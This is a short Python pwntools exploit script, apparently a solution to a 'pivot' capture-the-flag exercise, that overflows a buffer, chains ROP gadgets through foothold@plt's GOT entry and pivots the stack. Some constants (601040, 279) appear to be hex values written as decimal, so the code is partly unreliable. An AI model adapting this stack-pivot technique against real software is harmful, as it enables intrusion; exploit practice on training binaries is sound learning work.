44 lines
1.1 KiB
Python
Executable File
44 lines
1.1 KiB
Python
Executable File
#!/usr/bin/env python3
|
|
from pwn import *
|
|
from os import getcwd
|
|
import re
|
|
|
|
#context.terminal = ['kitty', 'sh', '-c']
|
|
print(context.terminal)
|
|
|
|
prog = gdb.debug('./pivot', gdbscript='''
|
|
b pwnme
|
|
b *0x4009a5
|
|
'''
|
|
|
|
)
|
|
|
|
payload = b''
|
|
payload += p64(0x0000000000400720) # foothold@plt
|
|
|
|
payload += p64(0x4009bb) # pop rax
|
|
payload += p64(601040) # foothold@plt's .got.plt entry
|
|
|
|
payload += p64(0x00000000004007c8) # pop rbp
|
|
payload += p64(279) # should be the offset of pwnem from foothold's .got.plt
|
|
|
|
payload += p64(0x4009c4) # adds the two
|
|
|
|
payload += p64(0x00000000004007c1) # jmp rax
|
|
prog.sendline(payload)
|
|
pivit_location = int(re.findall('0x[0-9a-z]{12}', prog.readregexS('0x[0-9a-z]{12}'))[0], 16)
|
|
print(hex(pivit_location))
|
|
|
|
payload = b''
|
|
#buffer overflow
|
|
for c in range(40):
|
|
payload += b'a'
|
|
|
|
payload += p64(0x4009bb) # pop rax
|
|
payload += p64(pivit_location) # pivot location
|
|
payload += p64(0x4009bd) # xchg rsp,rax
|
|
|
|
prog.sendlineafter('Now please send your stack smash', payload)
|
|
prog.interactive()
|
|
|